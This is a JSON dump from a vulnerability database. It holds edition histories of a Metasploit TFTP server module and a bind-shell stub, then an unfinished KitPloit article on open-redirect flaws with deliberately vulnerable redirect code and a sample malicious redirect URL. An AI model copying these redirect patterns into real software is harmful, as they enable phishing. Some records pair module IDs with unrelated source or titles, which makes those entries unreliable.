#{@session_id}\",\n 'vars_post' => {\n 'os_username' => datastore['HttpUsername'],\n 'os_password' => datastore['HttpPassword'],\n 'os_destination' => '',\n 'user_role' => '',\n 'atl_token' => '',\n 'login' => 'Log+In'\n }\n })\n end\n\n # Finds SID from HTTP response headers\n def get_sid(res)\n if res.nil?\n return '' if res.blank?\n end\n res.get_cookies.scan(/(JSESSIONID=\\w+);*/).flatten[0] || ''\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T10:04:14", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", 
"published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-05T14:29:15", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-10-05T14:29:15"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2251-1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1945-1:55523"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}, {"type": "msupdate", "idList": ["MS:18552C40-7E36-4F15-960A-9717A4912AF1", "MS:2CA3D95F-1ECB-4850-AEB4-AFB63CD6374A", "MS:E08D28EF-D685-412C-B0BC-8CC26BF899C3", "MS:9668152F-78A1-44F9-A229-38E86189703A", "MS:16216817-6043-4587-A803-9B3A9F3A58CC"]}], "modified": "2019-10-05T14:29:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP 
File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T14:29:15", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "ffc44867296a30f1a51496c92c2b3ca9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Unix Command Shell, Bind TCP (stub)", "description": "Listen for a connection and spawn a command shell (stub only, no payload)\n", "published": 
"2017-12-28T22:21:37", "modified": "2017-12-28T22:21:37", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-06T15:48:11", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 3.1, "vector": "NONE", "modified": "2019-10-06T15:48:11"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2260-1", "OPENSUSE-SU-2019:2251-1"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1946-1:BCAEB", "DEBIAN:DLA-1945-1:55523"]}, {"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}], "modified": "2019-10-06T15:48:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/bind_stub.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 0\n\n include Msf::Payload::Single\n include 
Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Bind TCP (stub)',\n 'Description' => 'Listen for a connection and spawn a command shell (stub only, no payload)',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd_bind_stub',\n 'RequiredCmd' => '',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Generate an empty payload\n #\n def generate\n ''\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-06T15:48:11", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-06T18:01:24", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-10-06T18:01:24"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2260-1", "OPENSUSE-SU-2019:2251-1"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1946-1:BCAEB", "DEBIAN:DLA-1945-1:55523"]}, {"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": 
"threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}], "modified": "2019-10-06T18:01:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n 
@tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-06T18:01:24", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "1668b924ad220a5441b80140fbe024e3", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-11T18:07:27", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-10-06T18:01:24"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2260-1", "OPENSUSE-SU-2019:2251-1"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1946-1:BCAEB", "DEBIAN:DLA-1945-1:55523"]}, {"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": 
"pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}], "modified": "2019-10-06T18:01:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || 
!/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-11T18:07:27", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-11T19:58:40", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 1.6, "vector": "NONE", "modified": "2019-10-11T19:58:40"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:C04394A6F48EB98804740BF71AB36B4C", 
"THREATPOST:58D26C239FA809E5AFB59B913C7C2F2D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1956-1:B9C38", "DEBIAN:DLA-1954-1:CF381"]}, {"type": "symantec", "idList": ["SMNTC-110381"]}, {"type": "exploitdb", "idList": ["EDB-ID:47491"]}, {"type": "kitploit", "idList": ["KITPLOIT:7842853011213233978"]}, {"type": "cve", "idList": ["CVE-2015-9479", "CVE-2019-17320", "CVE-2019-1333", "CVE-2019-1376", "CVE-2019-1375", "CVE-2019-1328", "CVE-2019-1365", "CVE-2019-1070", "CVE-2019-1329", "CVE-2019-1313"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:86C26266774161075BFD1BBE158CE9EE"]}], "modified": "2019-10-11T19:58:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def 
run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-11T19:58:40", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "3d89a3b5af133f1627d72096317b7656", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-30T11:18:56", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2019-10-30T11:18:56"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:12C7393B970A5A1BA295EC228437B2CF"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:70B3C77A2DC5965EB28755E5F9FD9BFD"]}, {"type": "mskb", "idList": ["KB2986475", "KB2961522", "KB2936871", "KB2905616", "KB2866475", "KB4524149", "KB4520004"]}, {"type": "exploitdb", "idList": ["EDB-ID:47561", "EDB-ID:47562"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2408-1"]}, {"type": "cve", "idList": ["CVE-2018-18931", "CVE-2019-6842", "CVE-2011-2538", "CVE-2019-15683", "CVE-2019-9926", "CVE-2019-9757", 
"CVE-2019-0210"]}, {"type": "postgresql", "idList": ["POSTGRESQL:CVE-2019-10208"]}], "modified": "2019-10-30T11:18:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-30T11:18:56", "differentElements": ["sourceData"], "edition": 39}], "viewCount": 46, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-30T14:36:53"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:3255", "RHSA-2019:3253"]}, {"type": "threatpost", "idList": ["THREATPOST:C94628D82D410DC578B7112E6EDC118E", "THREATPOST:12C7393B970A5A1BA295EC228437B2CF"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:70B3C77A2DC5965EB28755E5F9FD9BFD"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9ADEDDC1CD8F85638779D7AE60E23719"]}, {"type": "mskb", "idList": ["KB2986475", "KB2961522", "KB2936871", "KB2905616", "KB2866475", "KB4524149", "KB4520004"]}, {"type": "talos", "idList": ["TALOS-2019-0940", "TALOS-2019-0941"]}, {"type": "exploitdb", "idList": ["EDB-ID:47562", "EDB-ID:47561"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2408-1"]}, {"type": "cve", "idList": ["CVE-2018-18931", "CVE-2019-15683"]}], "modified": "2019-10-30T14:36:53"}, "vulnersScore": 3.2}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => 
MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}
{"kitploit": [{"lastseen": "2019-12-07T19:35:54", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-doCKQ-FPiBE/XemX3eOZxDI/AAAAAAAARB8/QE7D_49w8W8RfG8exZPZ23vuDNsm-FXUQCNcBGAsYHQ/s1600/open-redirection-vulnerability.png>)\n\n \nUnvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a [ phishing ](<https://www.kitploit.com/search/label/Phishing> \"phishing\" ) scam and steal user credentials. \nBecause the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application\u2019s access control check and then forward the attacker to privileged functions that they would normally not be able to access. \n \n** Java : ** \n\n \n \n response.sendRedirect(\"http://www.mysite.com\"); \n\n \n** PHP : ** \n\n \n \n <?php\n /* Redirect browser */\n header(\"Location: http://www.mysite.com\");\n ?>\n\n \n** ASP .NET : ** \n\n \n \n Response.Redirect(\"~/folder/Login.aspx\")\n\n \n** Rails : ** \n\n \n \n redirect_to login_path\n\nIn the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker. \n \n** Dangerous URL Redirects ** \nThe following examples demonstrate unsafe redirect and forward code. 
\n \n** Dangerous URL Redirect Example 1 ** \nThe following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL: \n\n \n \n response.sendRedirect(request.getParameter(\"url\"));\n\nThe following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL: \n\n \n \n $redirect_url = $_GET['url'];\n header(\"Location: \" . $redirect_url);\n\nA similar example of C# .NET [ Vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"Vulnerable\" ) Code: \n\n \n \n string url = request.QueryString[\"url\"];\n Response.Redirect(url);\n\nAnd in Rails: \n\n \n \n redirect_to params[:url]\n\nThe above code is vulnerable to an attack if no validation or extra method controls are applied to verify the legitimacy of the URL. This [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) could be used as part of a phishing scam by redirecting users to a malicious site. \nIf no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example: \n\n \n \n http://example.com/example.php?url=http://malicious.example.com\n\nThe user sees the link pointing to the original trusted site ( ` example.com ` ) and does not realize that a redirection could take place. \n \n** Dangerous URL Redirect Example 2 ** \nASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to upgrade to MVC 3. \nThe code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is performed on the returnUrl parameter. 
\nASP.NET MVC 2 LogOn action in ` AccountController.cs ` (see [ Microsoft ](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Docs link provided above for the context): \n\n \n \n [HttpPost]\n public ActionResult LogOn(LogOnModel model, string returnUrl)\n {\n if (ModelState.IsValid)\n {\n if (MembershipService.ValidateUser(model.UserName, model.Password))\n {\n FormsService.SignIn(model.UserName, model.RememberMe);\n if (!String.IsNullOrEmpty(returnUrl))\n {\n return Redirect(returnUrl);\n }\n else\n {\n return RedirectToAction(\"Index\", \"Home\");\n }\n }\n else\n {\n ModelState.AddModelError(\"\", \"The user name or password provided is incorrect.\");\n }\n }\n \n // If we got this far, something failed, redisplay form\n return View(model);\n }\n\n \n** Preventing Unvalidated Redirects and Forwards ** \nSafe use of redirects and forwards can be done in a number of ways: \n\n\n * Simply avoid using redirects and forwards. \n * If used, do not allow the destination URL to be taken from user input. This can usually be done. Otherwise, you should have a method to validate the URL. \n * If user input can\u2019t be avoided, ensure that 